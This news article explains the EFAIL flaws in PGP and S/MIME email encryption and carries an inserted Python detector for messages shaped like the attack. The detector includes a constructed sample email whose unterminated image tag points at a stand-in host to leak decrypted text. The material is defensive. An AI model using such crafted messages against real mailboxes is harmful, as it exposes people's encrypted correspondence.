
Email encryption flaw gives hackers full access to your secret messages

Researchers at the Münster University of Applied Sciences discovered vulnerabilities in the Pretty Good Privacy (PGP) and S/MIME technologies used to encrypt email. The problem lies in how email clients use these plug-ins to decrypt HTML-based emails. Individuals and companies are encouraged to disable PGP and/or S/MIME in their email clients for now and use a separate application for message encryption.

Called EFAIL, the vulnerability abuses “active” content rendered within HTML-based emails, such as images, page styles, and other non-text content stored on a remote server. To carry out an attack successfully, the hacker must first possess the encrypted email, whether obtained through eavesdropping, hacking into an email server, and so on.

The first attack method is called “Direct Exfiltration” and abuses vulnerabilities in Apple Mail, iOS Mail, and Mozilla Thunderbird. An attacker creates an HTML-based email consisting of three parts: the start of an image request tag, the “stolen” PGP or S/MIME ciphertext, and the end of an image request tag. The attacker then sends this revised email to the victim.

On the victim’s end, the email client first decrypts the second part and then combines all three into one email. It then converts everything into a URL starting with the hacker’s address and sends a request to that URL to retrieve the nonexistent image. The hacker receives the image request, which contains the entire decrypted message.

The second method is called the “CBC/CFB Gadget Attack,” which resides within the PGP and S/MIME specifications themselves and therefore affects all email clients. In this case, the attacker locates the first block of encrypted plaintext in the stolen email and adds a fake block filled with zeroes. The attacker then injects image tags into the encrypted plaintext, creating a single encrypted body part. When the victim’s client opens the message, the plaintext is exposed to the hacker.
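Both attack methods described above depend on the same two things being visible in the message the victim receives: an HTML part that wraps or follows the encrypted part, and a reference to remote content that gives the decrypted text a way out. The following is an added example, not code from the article or from the EFAIL researchers, showing how a mail gateway or client plug-in could flag messages with that shape before rendering them. It uses only Python's standard `email` library; the sample message, the `mail.example` and `collector.example` hostnames and the PGP ciphertext are all constructed placeholders.

```python
"""Flag MIME messages that show the EFAIL direct-exfiltration shape or that
load remote content next to an encrypted part.

Added example, not code from the article or the EFAIL paper.  Assumes the
caller passes the raw RFC 5322 bytes of a message; all sample data below is
constructed (placeholder hosts, placeholder ciphertext)."""
import re
from email import message_from_bytes, policy

# Content types that carry PGP/MIME (RFC 3156) or S/MIME (RFC 8551) ciphertext.
ENCRYPTED_TYPES = {
    "multipart/encrypted",
    "application/pgp-encrypted",
    "application/pkcs7-mime",
    "application/x-pkcs7-mime",
}

# An <img ... src="http://host/ whose attribute value never closes before the
# HTML part ends: the "start of an image request tag" described in the article.
OPEN_IMG = re.compile(r'<img[^>]*\bsrc\s*=\s*["\']?[^"\'>]*\Z', re.I | re.S)

# Any src= attribute or CSS url( ) that points at an http(s) or scheme-relative
# host, i.e. content the client would fetch from a remote server when rendering.
REMOTE_REF = re.compile(r'(?:\bsrc\s*=|\burl\s*\()\s*["\']?\s*(?:https?:)?//', re.I)


def top_level_parts(msg):
    """Return the body parts in order; an encrypted container counts as one part."""
    if msg.is_multipart() and msg.get_content_type() not in ENCRYPTED_TYPES:
        return list(msg.iter_parts())
    return [msg]


def analyze(raw: bytes) -> list[str]:
    """Return a list of human-readable findings (empty means nothing suspicious)."""
    msg = message_from_bytes(raw, policy=policy.default)
    parts = top_level_parts(msg)
    findings = []
    for i, part in enumerate(parts):
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content().rstrip()
        if REMOTE_REF.search(html):
            findings.append(f"part {i}: HTML references remote content")
        nxt = parts[i + 1] if i + 1 < len(parts) else None
        if nxt is not None and nxt.get_content_type() in ENCRYPTED_TYPES \
                and OPEN_IMG.search(html):
            findings.append(f"part {i}: unterminated <img src=...> immediately "
                            f"before encrypted part {i + 1} "
                            "(EFAIL direct-exfiltration shape)")
    return findings


# Constructed sample in the three-part layout the article describes.  The
# ciphertext is a placeholder, not a real PGP message.
SAMPLE_EFAIL_SHAPE = b"""\
From: sender@mail.example
To: victim@mail.example
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html; charset=us-ascii

<html><body><img src="http://collector.example/
--outer
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="enc"

--enc
Content-Type: application/pgp-encrypted

Version: 1
--enc
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
PLACEHOLDER-CIPHERTEXT-NOT-A-REAL-MESSAGE
-----END PGP MESSAGE-----
--enc--
--outer
Content-Type: text/html; charset=us-ascii

"></body></html>
--outer--
"""

# Constructed benign HTML mail: an inline (cid:) image is not remote content.
SAMPLE_BENIGN = b"""\
From: sender@mail.example
To: victim@mail.example
Subject: plain html
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<html><body><p>Hello</p><img src="cid:logo@mail.example"></body></html>
"""

if __name__ == "__main__":
    for name, raw in (("efail-shape", SAMPLE_EFAIL_SHAPE), ("benign", SAMPLE_BENIGN)):
        print(name, analyze(raw) or ["no findings"])
```

The remote-content check is the one that matters for both attack variants, since the gadget attack also needs the client to fetch an image from the attacker's server; a client that refuses to load remote content, as the article recommends by disabling HTML rendering, denies both variants their exfiltration channel even when the ciphertext has been tampered with.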

Ultimately, if you don’t use PGP or S/MIME for email encryption, then there’s nothing to worry about. But individuals, companies, and corporations who use these technologies on a daily basis are advised to disable related plugins and use a third-party client to encrypt emails, such as Signal (iOS, Android). And because EFAIL relies on HTML-based emails, disabling HTML rendering is also advised for now. 

“This vulnerability might be used to decrypt the contents of encrypted emails sent in the past. Having used PGP since 1993, this sounds baaad (sic),” F-Secure’s Mikko Hypponen wrote in a tweet. He later said that people use encryption for a reason: Business secrets, confidential information, and more.  

According to the researchers, “some” email client developers are already working on patches that either eliminate EFAIL altogether or make the exploits harder to accomplish. They say the PGP and S/MIME standards need an update, but that “will take some time.” The full technical paper can be read here.

The problem was first leaked by the Süddeutsche Zeitung newspaper prior to the scheduled news embargo. After the EFF contacted the researchers to confirm the vulnerabilities, the researchers were forced to release the technical paper prematurely.

Kevin Parrish
Former Digital Trends Contributor